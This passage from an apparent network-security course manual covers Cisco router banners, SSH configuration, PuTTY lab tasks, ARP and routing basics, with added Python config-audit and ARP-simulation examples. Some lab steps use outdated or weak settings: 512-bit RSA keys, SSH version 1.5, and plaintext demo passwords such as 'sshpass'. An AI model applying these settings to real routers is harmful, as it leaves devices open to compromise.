• Define who is and who is not an authorized user of the system(s).

• Provide adequate legal standing to both prosecute offenders and protect the administrators of the equipment.

The following is an example of what a banner could look like for an organization:

Warning!!! This system is designed solely for the authorized users of Company X on official business. Users of this system understand that there is no expectation of privacy, and that use of the system may be monitored and recorded. Use of this system is consent to said monitoring and recording. Users of this system acknowledge that if monitoring finds evidence of misuse, abuse, and/or criminal activity, that system operators may provide monitoring and recording data to law enforcement officials.

Implementing Cisco Banners
On the Cisco router, there are several types of banners available:

• MOTD banner—The MOTD banner is for setting Messages Of The Day. This is not an efficient location for the default warning banner, because the MOTD banner is something that literally can change with each day. You do not want to be setting the warning banner each and every day, and worrying about missing a day. This banner is used for sending notices to users, such as if there is an upcoming system shutdown for upgrading the IOS.

• Login banner—The login banner is where the warning banner should be located. This banner will be shown to each user every time a login attempt happens. The banner is set in Configure Terminal Mode, and uses a beginning and ending delimiter character. The delimiter can cause confusion, but is quite simple. Any character can be used as a delimiter; you just must make sure to use the same character at the beginning and the end. In the following configuration fragment, the letter C is used as the delimiter character:


Router#configure terminal
Router(config)#banner login C
Warning!!! This system is designed solely for the authorized
users of Company X on official business. Users of this system
understand that there is no expectation of privacy, and that
use of the system may be monitored and recorded. Use of this
system is consent to said monitoring and recording. Users of
this system acknowledge that if monitoring finds evidence of
misuse, abuse, and/or criminal activity, that system
operators may provide monitoring and recording data to law
enforcement officials.
C
Router(config)#^Z
Router#

• EXEC banner—The EXEC banner is used for setting a message for users who enter EXEC, or Privileged, Mode. You can create a new banner, use the same warning banner, or whatever else you wish. The process for setting a new banner is nearly identical to the process for the login banner. The difference is in the command. Instead of the command banner login, you use the command banner exec. In the following configuration fragment, you can see the exec banner created, with a delimiter of the pound sign (#):

Router#configure terminal
Router(config)#banner exec #
Reminder!!! When you logged into this system, you
acknowledged that you are an authorized user of Company X
systems. You also acknowledged that your use of this system
may be monitored and recorded. Finally, you agreed that if
misuse, abuse, and/or criminal activity are found while
monitoring, that law enforcement officials may be contacted.
#
Router(config)#^Z
Router#

TASK 5A-2
Configuring Login Banners

1. Create the configuration fragment that you would use to create a login warning banner. You can include whatever text you like for the banner, but use the letter B as your delimiter.

A possible response is:

Router#configure terminal
Router(config)#banner login B
Warning!!! This is the login banner for the SCNP HTI class.
If you are not a member of this class, you may not access
this system. Users of this system are advised that nearly
everyone is running packet-capturing utilities and everyone
is watching you!
B
Router(config)#^Z
Router#


SSH Overview
Although Telnet is used in this course—and is often the method of choice for many administrators—from a security perspective, it is not a solid option. This is due to the fact that there is no encryption on the session; all commands and responses are cleartext and can be viewed by any packet-capture utility.

SSH, or Secure Shell, provides for a higher level of security on remote connections to the router. Using RSA public key cryptography, SSH establishes a secure channel of communication between client and server.

Cisco IOS support for SSH is not present in older versions of the IOS, such as 11.2 and 11.3. After version 12.0(5) with IPSec, support for SSH was included. And, only IOS versions that have IPSec will have SSH support.

In order for SSH sessions to be established, there is some preparation that must take place on the router. The router must have usernames defined, must have a hostname defined, and must have a domain name set.

Router Configuration to use SSH
In implementing SSH, you should use Access Control Lists, controlling VTY access. A later section fully details an Access Control List (ACL). However, in brief, the ACL is used to regulate access (denial or permission) to an object on the router.

In this configuration fragment, ACL 23 is used to define the host that is allowed to access the router for administration. The host name of the router is simply Router and the domain will be scp.mil. The username is SSHUser and the password for this user is No+3ln3+.

Router#configure terminal
Router(config)#ip domain-name scp.mil
Router(config)#access-list 23 permit 192.168.51.45
Router(config)#line vty 0 4
Router(config-line)#access-class 23 in
Router(config-line)#exit
Router(config)#username SSHUser password No+3ln3+
Router(config)#line vty 0 4
Router(config-line)#login local
Router(config-line)#exit
Router(config)#

The router configuration is close to being finished, but there is still some work to be done. RSA must be enabled so that the key pair can be generated and used. When creating a new key pair, be aware that it may take some time for the pair to complete. In this fragment, all you will see is the command for creating the key pair, crypto key generate rsa, the use of 1024 as the number of bits (Cisco recommended minimum), and the OK when the calculation is done.

Not all versions of the IOS support SSH. Versions that support IPSec also support SSH.


Router#configure terminal
Router(config)#crypto key generate rsa
The name for the keys will be: Router.scp.mil
Choose the size of the key modulus in the range of 360 to 2048
for your General Purpose Keys. Choosing a key modulus greater
than 512 may take a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys ...
[OK]
Router(config)#

You have now enabled SSH to run on your router. There are some commands that you can use to fine-tune the SSH function, and you will need to configure your client to use SSH.

The following configuration fragment is used to define the timeout, in seconds, that the server will wait for the client to provide a password. The default is 120 seconds, and the Cisco recommended time is 90 seconds. In this fragment, the time has been changed to 45 seconds.

Router#configure terminal
Router(config)#ip ssh time-out 45
Router(config)#^Z
Router#

The next fragment is used to define the number of retries that will be allowed before the router drops the connection. The default for this setting is 3, and the maximum is 5. This is a setting that you may rarely change, but in the fragment, the retries are set to 2, so after the second bad try, the connection is dropped:

Router#configure terminal
Router(config)#ip ssh authentication-retries 2
Router(config)#^Z
Router#

Finally is the configuration to let the VTY sessions on the router accept both SSH and Telnet as valid connection types. If you want to have only SSH used, which is the point here, you would not add the word telnet to the command.

Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#transport input ssh telnet
Router(config-line)#^Z
Router#
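As an added example (not from the course and not a Cisco tool), the following Python script audits a saved running-config excerpt for the hardening items covered in this topic: an enable secret, login and password on the console line, a login banner, the domain name needed for the RSA keys, the SSH time-out and retry settings, and VTY lines restricted with access-class, login local and transport input ssh. The sample configuration and its placeholder secrets are constructed for the demonstration; it still allows telnet, which the audit flags.

```python
"""Audit a Cisco IOS running-config excerpt for the VTY/SSH hardening settings
covered in this topic. Added example for the course text; not Cisco tooling.
Note that the running-config shows 'line con 0' for what you typed as
'line console 0'."""

# Constructed sample: the course's fragments applied, except that the VTY
# lines still allow telnet alongside ssh (the weak setting the audit flags).
SAMPLE_CONFIG = """\
hostname Router
ip domain-name scp.mil
enable secret 5 $1$PLACEHOLDER$hashvaluegoeshere
username SSHUser password 0 PLACEHOLDER
banner login ^C
Warning!!! This system is solely for authorized users of Company X.
^C
access-list 23 permit 192.168.51.45
ip ssh time-out 45
ip ssh authentication-retries 2
line con 0
 login
 password PLACEHOLDER
line vty 0 4
 access-class 23 in
 login local
 transport input ssh telnet
"""

# Same config with the fix this section recommends: drop the word telnet.
HARDENED_CONFIG = SAMPLE_CONFIG.replace("transport input ssh telnet",
                                        "transport input ssh")


def parse_sections(config):
    """Split a config into global lines and per-'line ...' sub-blocks.
    IOS indents sub-mode commands by one space under their mode header."""
    global_lines, sections, current = [], {}, None
    for raw in config.splitlines():
        if raw.startswith(" ") and current is not None:
            sections[current].append(raw.strip())
        elif raw.startswith("line "):
            current = raw.strip()
            sections[current] = []
        else:
            current = None
            global_lines.append(raw.strip())
    return global_lines, sections


def _value(lines, prefix, default):
    """Return the trailing integer of the first line starting with prefix."""
    for line in lines:
        if line.startswith(prefix):
            return int(line.split()[-1])
    return default


def audit(config):
    """Return a list of findings; an empty list means every check passed."""
    g, sections = parse_sections(config)
    findings = []
    if not any(l.startswith("enable secret") for l in g):
        findings.append("no enable secret configured")
    if any(l.startswith("enable password") for l in g):
        findings.append("legacy enable password present; use enable secret instead")
    if not any(l.startswith("ip domain-name") for l in g):
        findings.append("ip domain-name missing (needed before crypto key generate rsa)")
    if not any(l.startswith("banner login") for l in g):
        findings.append("no login banner configured")
    # Defaults per this topic: time-out 120 s (90 s recommended), 3 retries
    timeout = _value(g, "ip ssh time-out", 120)
    if timeout > 90:
        findings.append(f"ip ssh time-out is {timeout}s; 90s or less is recommended")
    if _value(g, "ip ssh authentication-retries", 3) > 3:
        findings.append("ip ssh authentication-retries above the default of 3")
    con = sections.get("line con 0", [])
    if "login" not in con or not any(l.startswith("password") for l in con):
        findings.append("line con 0 has no login/password")
    vty = sections.get("line vty 0 4", [])
    if not any(l.startswith("access-class") for l in vty):
        findings.append("line vty 0 4 has no access-class limiting source hosts")
    if "login local" not in vty:
        findings.append("line vty 0 4 does not use login local")
    # No explicit transport input line is treated as unrestricted: the audit
    # wants an explicit ssh-only setting.
    transport = next((l for l in vty if l.startswith("transport input")),
                     "transport input all")
    allowed = transport.split()[2:]
    if "telnet" in allowed or "all" in allowed:
        findings.append(f"line vty 0 4 still accepts telnet: {transport}")
    return findings


if __name__ == "__main__":
    for name, cfg in (("sample", SAMPLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, "->", audit(cfg) or ["no findings"])
```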

SSH Verification
On the router, you will want to run some diagnostic commands to find out who is connected and how. These commands will show you the state of your SSH connections. There are some differences based on the IOS version you are running, so note that in the following.

If you are running IOS version 12.1, and you want to see the state of SSH connections, including who is connected, use the command show ip ssh. The following fragment lists what this command will reveal.

Router#show ip ssh
Connection  Version  Encryption  State  Username
0           1.5      3DES        4      SSHUser
Router#


If you are running IOS version 12.2, there are two commands for viewing SSH information. First is the show ip ssh command, only here it lists the details, such as timeout and version. The second command is show ssh, and this shows the user connected. The following fragment shows both commands used, one after the other, and their result onscreen.

Router#show ip ssh
SSH Enabled - version 1.5
Authentication timeout: 45 secs; Authentication retries: 2
Router#show ssh
Connection  Version  Encryption  State            Username
0           1.5      3DES        Session Started  SSHUser
Router#

INSTRUCTOR TASK 5A-3
Configuring SSH on a Router

Setup: Observe as your instructor performs the SSH configuration on the LEFT and RIGHT routers.

1. Console in to the LEFT router, and switch to EXEC mode.

2. At the LEFT# prompt, enter conf t to switch to config mode. The LEFT(config)# prompt should be displayed.

3. Enter ip domain-name left.com to provide a domain name.

4. Enter crypto key generate rsa to create key pairs. When you are prompted for the number of bits in the modulus, press Enter to accept the default of 512.

5. Enter ip ssh time-out 120 to set the timeout value to 2 minutes.

6. Enter ip ssh authentication-retries 3 to limit the number of unsuccessful attempts.

7. Enter line vty 0 4 to begin the line configuration. The LEFT(config-line)# prompt is displayed.

8. Enter transport input ssh to limit the VTY sessions to accept only SSH connections.

9. Enter login local to provide for local login.

10. Enter exit to return to the LEFT(config)# prompt.

11. Enter username sshl01 privilege 15 password sshpass to assign a user name and password for student station L01.

Repeat this command to assign user names and passwords for all other student stations on the left side of the classroom.

12. Enter exit to return to the LEFT# prompt.


13. Enter copy ru st to save the configuration changes. Press Enter to accept the default file name.

14. Enter exit to return to the LEFT> prompt.

15. Disconnect from the LEFT router, and console in to the RIGHT router.

16. Use the steps listed previously as a guide to set up SSH on the RIGHT router. Use the domain name right.com, and create user names such as sshr01, sshr02, and so forth.

17. Disconnect from the RIGHT router, and close the console.

18. Try to Telnet to either of the ssh-enabled routers, and ask students to do the same. None of the attempts should be successful, as you have blocked Telnet connections on both routers.

Client Configuration to use SSH
Just as there was some configuration required on the server, some configuration is needed on the client side to run SSH. However, the configuration on the client is not nearly as complex. In general, a client SSH application must be installed, and the client must be configured to use the application in communication with the router. There are several SSH client programs available, and in this example, the PuTTY program is used. Figure 5-1 shows an example of the settings for this application.

Figure 5-1: The client configuration for an SSH session.

During the configuration, you will be asked to provide input on the cryptography used, and you will select RSA. Additionally, you will be required to present proper credentials when connecting, meaning the local username on the router and the password. Once you enter the proper credentials, you will have secure access, and operation will be no different than using Telnet.


TASK 5A-4
Configuring the SSH Client

Setup: You are logged on to Windows 2000 Server as the renamed Administrator account. The routers have a limited number of simultaneous logins, so you might need to take turns accessing the routers if your class has many students in it.

1. Copy the file putty.exe from the location provided by your instructor to your boot partition. The PuTTY program is a popular freeware package.

2. Double-click putty.exe.

3. For Host Name, enter the IP address for your router. Your instructor will provide the router IP addresses. The router you use is named LEFT or RIGHT, based on your location in the classroom.

4. Click SSH (Port 22).

5. Click Open to initiate the connection.

6. When you are prompted, click Yes to accept the key, and click Yes to continue the connection. Press Enter to display the login prompt.

7. Enter your ssh user name, such as sshl01. You should be prompted for a password.

8. Enter sshpass to complete the login sequence.

9. After authentication has taken place, log out and close PuTTY.

Topic 5B
Routing Principles
To be able to secure your routers and routed networks, you need to understand some basic principles related to routing in general. Let's begin by looking at how routers and routing fit into the OSI Model.

The ARP Process
Most people are aware that routers function at the Network layer, but that statement must be understood as routers route at the Network layer. Routers are affected by and operate at other layers as well, including the Data Link layer.

The OSI model is the foundation of all network communication. Routers fit into the OSI model just as other devices do, with their primary functionality being at the Network layer. In this lesson, the vast majority of the content will be focusing on the Network layer; however, there are important areas of the Data Link layer that must be investigated as well.

Provide students with the location of the PuTTY installation program.

Provide students with the IP addresses for the LEFT and RIGHT routers.

334 Hardening The Infrastructure (SCP)


MAC addresses are split into two parts, each containing six hexadecimal digits. The first six digits are the vendor code or OUI (Organizationally Unique Identifier), and the last six are assigned by the vendor, usually as a serial number. These 48-bit numbers are intended to be globally unique, so that no two NICs share a MAC address. In practice a MAC address can be changed in software on most operating systems, so uniqueness is an expectation rather than a guarantee, and a MAC address should never be treated as proof of a device's identity.

ARP (RFC 826) is used to make the connection between Layer Two and Layer Three addresses. ARP is used in the following examples of data moving from one host to another.

The first example shows data moving from Node 1 to Node 2 on a local network segment. In order for the data to arrive properly, the following steps must occur:

1. Node 1 (knowing the Network layer address of Node 2) sends a local broadcast on the LAN indicating that Node 1 wishes to learn the Data Link address for Node 2.

2. Since Node 1 sent a broadcast, all nodes on the local segment receive and process the request, discarding it when they identify that the broadcast was not intended for them.

3. Node 2 identifies the message requesting its MAC address and responds, as a unicast to Node 1, with its Data Link address. Node 2 also stores the MAC address of Node 1 for future use.

4. Node 1 sends the packet directly to the Data Link address of Node 2.

Figure 5-2 shows this process between Node 1 and Node 2 on the same segment.

Figure 5-2: This example shows the process of a local ARP broadcast between two nodes.

To take this concept a bit further, let's look at the process of MAC address resolution if Node 2 is not on the local segment (see Figure 5-3). In order for communication to take place between Nodes 1 and 2, the following steps must occur:

1. Node 1 determines that it needs to communicate with Node 2. As with all IP communication, Node 1 ANDs its own IP address with its subnet mask, then ANDs Node 2's IP address with Node 1's subnet mask.

2. Node 1 compares the results of the two AND operations to determine whether they are the same, meaning that the nodes are on the same network, or different, meaning that the nodes are on different networks. In this example, the results differ, so Node 1 concludes that Node 2 is on a different network.

3. If Node 1's TCP/IP stack is configured with a default gateway, Node 1 uses ARP to resolve the default gateway's address, exactly as in the previous example (the default gateway is on Node 1's own network), and uses the gateway's MAC address as the destination for every frame carrying a packet to Node 2.

Note: If no default gateway is configured for Node 1, Node 1 cannot communicate with Node 2 at all; a ping to Node 2 fails with a message that the destination host is unreachable. For a ping to succeed across a routed network such as this one, Node 2 must also have an appropriate default gateway in its IP configuration, because the Echo Reply has to be routed back. If Node 2 exists but has no default gateway, a ping from Node 1 to Node 2 ends with a message that the request timed out.

The IEEE (Institute of Electrical and Electronics Engineers) issues OUIs to network hardware vendors so that MAC addresses remain unique.

Layer Two addresses are used to get frames from one local node to another on the same segment, while Layer Three addresses are used to get packets from one network to another.

Figure 5-3: This example shows the process of a router returning the ARP request of a remote node.

These examples are geared towards TCP/IP as a protocol, and we will use TCP/IP throughout this lesson. IP addressing is the primary example of Network layer addressing used today.
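The same-network test and the ARP request/reply exchange described above, as an added Python example. This is illustration code, not part of the course: the node names, MAC addresses and the 10.0.10.0/24 and 20.0.20.0/24 addresses are constructed, and the Node class is an assumption; the packet layout follows RFC 826. It goes slightly beyond the text by also covering the no-gateway case and the target node caching the requester's address.

```python
"""ARP next-hop decision and RFC 826 request/reply handling.

Added example: illustration code, not part of the course. The node names,
MAC addresses and the 10.0.10.0/24 and 20.0.20.0/24 addresses are constructed.
"""
import struct
from ipaddress import IPv4Address

ARP_REQUEST, ARP_REPLY = 1, 2
# RFC 826 Ethernet/IPv4 ARP: htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = 28 bytes
_ARP_FMT = "!HHBBH6s4s6s4s"


def same_network(ip_a, ip_b, mask):
    """The AND test from the text: both addresses ANDed with the *local* mask."""
    m = int(IPv4Address(mask))
    return int(IPv4Address(ip_a)) & m == int(IPv4Address(ip_b)) & m


def arp_target(src_ip, mask, dst_ip, default_gateway=None):
    """Address whose MAC must be resolved to reach dst_ip.

    dst_ip itself when it is local, the default gateway when it is not, and
    None when it is remote and no gateway is configured (the text's
    "destination host unreachable" case).
    """
    return dst_ip if same_network(src_ip, dst_ip, mask) else default_gateway


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(oper, sender_mac, sender_ip, target_ip, target_mac="00:00:00:00:00:00"):
    """Serialise an ARP packet; a request leaves the target MAC as zeros."""
    return struct.pack(_ARP_FMT, 1, 0x0800, 6, 4, oper,
                       mac_bytes(sender_mac), IPv4Address(sender_ip).packed,
                       mac_bytes(target_mac), IPv4Address(target_ip).packed)


def parse_arp(raw):
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(_ARP_FMT, raw[:28])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {"oper": oper, "sha": mac_str(sha), "spa": str(IPv4Address(spa)),
            "tha": mac_str(tha), "tpa": str(IPv4Address(tpa))}


class Node:
    """A host, or a router interface, with an IP configuration and an ARP cache."""

    def __init__(self, ip, mac, mask, gateway=None):
        self.ip, self.mac, self.mask, self.gateway = ip, mac, mask, gateway
        self.arp_cache = {}                      # ip -> mac

    def handle_arp(self, raw):
        """Steps 2 and 3 of the text: every node sees the broadcast, only the target answers."""
        pkt = parse_arp(raw)
        if pkt["tpa"] != self.ip:
            return None                          # not for us: discard
        self.arp_cache[pkt["spa"]] = pkt["sha"]  # the target remembers the sender
        if pkt["oper"] == ARP_REQUEST:
            return build_arp(ARP_REPLY, self.mac, self.ip, pkt["spa"], pkt["sha"])
        return None

    def resolve(self, dst_ip, segment):
        """MAC to put in the frame for dst_ip, or None if dst_ip is unreachable."""
        target = arp_target(self.ip, self.mask, dst_ip, self.gateway)
        if target is None:
            return None
        if target not in self.arp_cache:
            request = build_arp(ARP_REQUEST, self.mac, self.ip, target)
            for node in segment:                 # step 1: the local broadcast
                if node is self:
                    continue
                reply = node.handle_arp(request)
                if reply is not None:            # whoever answers is cached, unverified
                    answer = parse_arp(reply)
                    self.arp_cache[answer["spa"]] = answer["sha"]
        return self.arp_cache.get(target)


def demo():
    """Constructed segment: two hosts and a router interface on 10.0.10.0/24."""
    node1 = Node("10.0.10.115", "00:11:22:33:44:01", "255.255.255.0", "10.0.10.1")
    node2 = Node("10.0.10.120", "00:11:22:33:44:02", "255.255.255.0", "10.0.10.1")
    router = Node("10.0.10.1", "00:11:22:33:44:fe", "255.255.255.0")
    segment = [node1, node2, router]
    return {
        "local": node1.resolve("10.0.10.120", segment),    # node 2's own MAC
        "remote": node1.resolve("20.0.20.207", segment),   # the router's MAC
        "learned_by_node2": node2.arp_cache.get("10.0.10.115"),
    }


if __name__ == "__main__":
    for what, mac in demo().items():
        print(f"{what}: {mac}")
```

Running it shows the local destination resolving to Node 2's own MAC, the remote destination resolving to the router's MAC (the default gateway), and Node 2 having cached Node 1's address without ever asking for it. One security point the exchange makes visible: nothing authenticates the reply. A node caches whichever answer arrives, which is the basis of ARP cache poisoning and the reason MAC addresses are hints, not identity.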


LAN-to-LAN Routing Process

The process of moving data from one host to another and from LAN to LAN is not complex. In the example shown in Figure 5-4, there is one router connecting two networks. There are two hosts defined, one on each network, using TCP/IP.

Figure 5-4: Two networks connected by a single router.

From this diagram, you can see the networks are connected via a single router. Both interfaces are Ethernet interfaces, and the IP addresses are given. In this example, Node 7 is trying to get a packet to Node 10. Since the nodes are in different networks, the packet must be routed to reach its destination.

An Ethernet frame is built at Node 7 with source IP address 10.0.10.115 and the source MAC address of Node 7. The destination IP address is 20.0.20.207, with the destination MAC address still unknown.

In this example, Node 7 broadcasts an ARP request for 20.0.20.207 itself, and the router answers with its own MAC address. This is proxy ARP, which Cisco routers enable by default on their interfaces; a host configured with a default gateway would instead resolve the gateway's address, as described earlier. Either way, Node 7 sends the frame to the router with a destination IP address of 20.0.20.207 and the destination MAC address of the router's E0 interface.

Once the router receives the frame, it in turn broadcasts an ARP request for 20.0.20.207 on the 20.0.20.0 segment. Node 10 responds, and the router receives the response. The router then builds a new frame, addressed to IP address 20.0.20.207 from IP address 10.0.10.115, with the source MAC address of the router's interface on the 20.0.20.0 network and the destination MAC address of Node 10. The IP addresses are unchanged; only the MAC addresses are rewritten (and the IP TTL is decremented by one, which is how each router marks its hop). Node 10 receives the frame and responds, following the same steps in reverse.


LAN-to-WAN Routing Process

The LAN-to-WAN routing process is not much different from the previous example; there are simply more steps involved, and the packet may change encapsulations along the way from Ethernet to something else and back to Ethernet. In the example shown in Figure 5-5, there is a routed network with two LANs connected via multiple routers in a WAN configuration.

Figure 5-5: Two end nodes connected over multiple routers in a WAN configuration.


For a packet to get from Node 7 to Node 10 in this configuration, several steps must happen:

1. Node 7 creates an ARP request for the MAC address of 50.0.50.150 (or, on a host configured with a default gateway, for the gateway's address).

2. The router connected to network 10.0.10.0 sees this request and, knowing it is the path to the destination network, replies to Node 7 with its own MAC address.

3. Node 7 creates a frame with source IP address 10.0.10.115, destination IP address 50.0.50.150, the source MAC address of Node 7, and the destination MAC address of the 10.0.10.0 router.

4. When the local router receives the packet, the source and destination IP addresses do not change. The encapsulation may change to fit the wire, PPP or Frame Relay for example.

5. The packet is forwarded from one router to the next; at each hop the IP addresses stay the same, and only the link-layer framing and addresses change.

6. Once the packet reaches the router for segment 50.0.50.0, the WAN encapsulation is removed, and an Ethernet frame is built with source IP address 10.0.10.115, destination IP address 50.0.50.150, the source MAC address of that router's local E0 interface, and the destination MAC address of Node 10.

TASK 5B-1 Performing IP and MAC Analysis

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. On your course CD-ROM, navigate to the \085545\Data\Captures folder, and open the ping-arp-mac.cap file. The file should open in Network Monitor.

2. Quickly scroll through the main capture, noting the frames and their functions. You will see it is a capture of an initial ARP exchange, followed by consecutive pings (Echo and Echo Reply packets).

3. Expand Frame Four.

4. Record the source and destination IP addresses and the source and destination MAC addresses here:

Source IP address: 172.16.10.1.

Destination IP address: 172.17.10.1.

Source MAC address: 00 D0 09 7F 0D 73.

Destination MAC address: 00 00 0C 8D B8 54.

If you need to, expand IP and Ethernet so that you can see the addresses.

5. Expand Frame Five, and record those IP and MAC addresses as well.


Source IP address: 172.17.10.1.

Destination IP address: 172.16.10.1.

Source MAC address: 00 00 0C 8D B8 54.

Destination MAC address: 00 D0 09 7F 0D 73.

6. Observe that, when pinging 172.17.10.1 from 172.16.10.1, the destination MAC address is 00000C8DB854.

7. Examine the exchanges in frames 6 and 7, 8 and 9, and 10 and 11 to seethe ping process complete.

8. Expand Frame Twelve, and record those IP and MAC addresses as well.

Source IP address: 172.16.10.1.

Destination IP address: 172.18.10.1.

Source MAC address: 00 D0 09 7F 0D 73.

Destination MAC address: 00 00 0C 8D B8 54.

9. Expand Frame Thirteen, and record those IP and MAC addresses as well.

Source IP address: 172.18.10.1.

Destination IP address: 172.16.10.1.

Source MAC address: 00 00 0C 8D B8 54.

Destination MAC address: 00 D0 09 7F 0D 73.

10. Observe that when pinging 172.18.10.1 from 172.16.10.1, the destination MAC address is again 00000C8DB854, the same next-hop MAC as in step 6, even though 172.17.10.1 and 172.18.10.1 are on different networks. The destination MAC in a frame is always that of the next hop, never that of the remote host.

11. Examine the exchanges in frames 14 and 15, 16 and 17, and 18 and 19 to see the ping process complete.

12. Leave Network Monitor open.

The Routing Process

Figure 5-6 shows a complex network, with many possible paths for the data to take across the network. The routers have to communicate with each other in order to determine the path for a given situation.


Figure 5-6: Potential paths that data can take to get from one node to another.

In order for the routers to exchange their data, they must have mutual paths of communication. These paths are the actual connections between the routers. By using logical addressing, the routers have defined networks on which to transmit data. The logical addressing minimizes the use of broadcasting, with the end result being more bandwidth for data transmission. In Figure 5-7, each segment with a letter is a unique Layer Three network segment.


Figure 5-7: Logical network addressing used in an internetwork.

The routers will use the information about the paths to which they are connected, including the type of connection and available bandwidth, to determine the routes for data to take. For example, the routers might decide that for a packet to get from network A to network N, it should travel from network A to B, to D, to H, to J, to K, to M, and then to N. There are many times when the fastest route is not a straight path!

Static and Dynamic Routing

In order for the router to be able to make decisions on where data should go, it needs to consult its routing table. The routing table is the list of known networks and the paths to reach those networks. (Routing tables will be discussed in detail in the next topic.)

Every time a packet reaches a router, the router needs to review the routing table to determine the appropriate path for the packet. The router must be aware of the other potential networks and the way to reach them.


Static Routes

The creation of these paths can happen either dynamically (automatically) or statically (manually). The first of these two concepts, static routing, is defined here.

A static route is a route that has been manually entered into the router to define the path to a remote network. Although its use is not desirable for every situation, static routing has several advantages:

• Precise control over the routes data will take across the network, with no possibility of a routing update from another device changing them.

• Easy to configure in small networks.

• Reduced bandwidth use, because no routing updates are exchanged.

• Reduced load on the routers, because no route calculations are needed.

Figure 5-8 shows a simple network configuration with two routers and their defined networks.

Figure 5-8: Two routers, Finance and Marketing, and the networks they connect.

The configuration fragments for the static routes on these two routers look like the following (each router points the network it cannot see at the far end of the shared 20.0.20.0 link):

MarketingRouter#config terminal
MarketingRouter(config)#ip route 10.0.10.0 255.255.255.0 20.0.20.1
MarketingRouter(config)#^Z
MarketingRouter#

FinanceRouter#config terminal
FinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2
FinanceRouter(config)#^Z
FinanceRouter#

Dynamic Routes

From the previous example, you can see that the command syntax is simple and entering the static routes takes little time. However, the previous example is a very small, simple network, and it is because of that simplicity that static routes work.


When the networks become more complex, static routing is not always a reasonable option. If there were a dozen routers, for example, each connected to several networks, maintaining static routes would become much more complex.

This is where dynamic routing enters the equation. Dynamic routing protocols can re-route around a failed link, converge so that all routers have a consistent view of the network, and calculate the best path through an internetwork.

Dynamic routing protocols use mathematical algorithms to determine routes and to exchange information with one another. The routers exchange that information at defined intervals, and the updates are used to make decisions on the routes to take and to reconfigure when required.

Because the routers exchange this data frequently, they are able to change paths and update as needed. This flexibility is what makes dynamic routing protocols so desirable. If a router goes down somewhere in the network, the remaining routers will reconfigure and find a way for the data to reach the other side of the network. An example of this is shown in Figure 5-9.

Figure 5-9: There are several routers and multiple paths data can take across this internetwork.


In the event that Finance Router 2 goes offline, and these routers are using dynamic routing, the other routers will reconfigure themselves to use only the other Finance Router. When the offline router comes back online, the other routers in the network will reconfigure themselves accordingly.

Comparing Routed Protocols and Routing Protocols

One area where people tend to be confused when dealing with routers is the difference between routed protocols and routing protocols. They are distinctly different. In this section, you will learn to differentiate between the two and draw the boundaries clearly around them, so that you can easily and quickly identify one or the other.

What are Routed Protocols?

For a protocol to be considered a routed protocol, it must have the following characteristics:

• It must contain Network-layer addressing information.

• It must have a method of locating a single host on a given network.

Routed protocols carry the information needed for user data to be addressed and moved between and across networks. A routed protocol defines enough internal structure to specify the layout and function of the fields inside a given packet.

The most common routed protocol of today (and of the last decade) is the Internet Protocol, or IP. Other routed protocols are Novell's IPX/SPX (Microsoft's implementation of IPX/SPX is NWLink) and AppleTalk. TCP/IP, IPX/SPX, and AppleTalk all provide addressing at the Network layer of the OSI model.

What are Routing Protocols?

While a routed protocol carries data from one host to another, a routing protocol is used by routers to exchange the information they need to forward that data from one network to another, across multiple routers. The routing protocol defines the format and transmission of the routing updates and messages exchanged between routers.

Routers use their assigned routing protocols to create, maintain, and exchange routing data. The routes that the protocol produces are then what the router uses to forward data packets from one network to another, including the decision on which path is best for the data.

Routing protocols also allow routers to learn the status and configuration of networks they are not directly connected to. In addition to learning about remote networks, routers use their routing protocols to tell remote routers about networks that those routers are not directly connected to.

Regardless of the routing protocol chosen, the routers must have consistent and open communication with each other in order to maintain a reliable picture, or map, of the network. It is this map that all the routers use when forwarding data packets from network to network. Because routers act on what they hear from their neighbors, anything that can send routing messages onto a segment can influence that map; this is why authenticating routing updates matters, as discussed under RIPv2 later in this topic.

Some examples of routing protocols are RIP (Routing Information Protocol), IGRP (Interior Gateway Routing Protocol), and OSPF (Open Shortest Path First).

Whether the protocol used is RIP, IGRP, or OSPF, it is important to remember that no end-user data is carried in routing protocol messages. The user data is carried by the routed protocol.


The Routing Protocols

The last area to cover in this topic is the actual protocols themselves. Here, we will discuss the common types of protocols and look at some examples of the protocols in action. The two common types are Distance Vector and Link-State.

Regardless of whether the protocol is Distance Vector or Link-State, for dynamic routing to function, two critical router functions must exist:

• An updated and consistent routing table.

• Scheduled updates between routers.

For the routing protocols to perform these two critical processes, they must conform to a given set of rules. These rules are part of the operation of the routing protocol. Examples of what these rules define include:

• The frequency of updates between routers.

• The amount of data contained in the updates.

• How the recipients of the routing data are found.

Calculating the different data paths, and ultimately choosing the most efficient one according to the given protocol, requires a defined formula. In the case of routers, that formula is known as a routing algorithm.

The routing algorithm is responsible for the actual calculation that determines the path data will take as it moves through the network. To make this calculation, the algorithm combines certain variables into what is known as a metric. The metric is then what is used in path determination.

Some of the variables used to create the overall metric of a given path are:

• Hop Count. The number of routers that a data packet must pass through to reach its destination. The fewer the hops, the shorter the path, and therefore the better the path is assumed to be.

• Cost. The cost of a link can be defined by the administrator or calculated by the router. The lower the cost, the more preferred the route.

• Bandwidth. The overall bandwidth that the link provides.

• MTU (Maximum Transmission Unit). The largest message size (in octets) that a link will carry.

• Load. How busy the link or router is: the amount of traffic the router must process and make forwarding decisions on.

Regardless of the routing protocol chosen, there is no single rule for selecting the best protocol based on its algorithm. The routing protocol must adapt when the network changes, and both Distance Vector and Link-State protocols have this ability. The process by which routers update their tables from this information and arrive at the same view of the network is called convergence. When all routers have the same view of the network, the network is converged.

It is the goal of all routing protocols to converge quickly, so that the routers maintain a consistent view of the routes available to network segments and do not use stale data to make routing decisions.

metric: The numeric value a routing algorithm assigns to a path, built from variables such as hop count, cost, or bandwidth; the path with the lowest metric is preferred.


Distance Vector Routing

